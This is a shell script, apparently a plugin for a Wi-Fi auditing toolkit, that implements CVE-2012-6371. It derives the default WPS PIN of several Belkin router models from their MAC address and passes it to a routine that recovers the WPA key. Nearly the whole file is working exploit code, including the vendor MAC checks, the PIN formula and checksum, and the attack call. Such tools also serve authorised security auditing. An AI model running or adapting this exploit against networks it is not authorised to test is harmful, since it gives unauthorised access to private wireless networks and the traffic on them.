blob: d4eb8e37b7569a81ef546942c5728f45b5c0dc3c (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
#!/bin/sh
# thanks to http://ednolo.alumnos.upv.es/?p=1295G
# for the PoC code
# Calculates the default WPS pin of Belkin Routers and returns the WPA key
#
# Implementation of CVE-2012-6371
# works :
# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
cd $(dirname $(readlink -f $0))
. ../lib/plugin_core
. ../lib/wps
parse_plugin_args "$@"
check_painmode
! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
calc_belkin(){
PRIVATE_MAC=${1}
p=$((0x$PRIVATE_MAC % 10000000))
wps_pin_checksum(){
pin=$1
accum=0
while [ $pin -ne 0 ];do
accum=$((accum + (3 * (pin % 10)) ))
pin=$((pin/10))
accum=$((accum + pin %10 ))
pin=$((pin/10))
done
echo $(( (10 - accum % 10) % 10))
}
printf "%07d%d" $p $(wps_pin_checksum $p)
return 0
}
try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})
|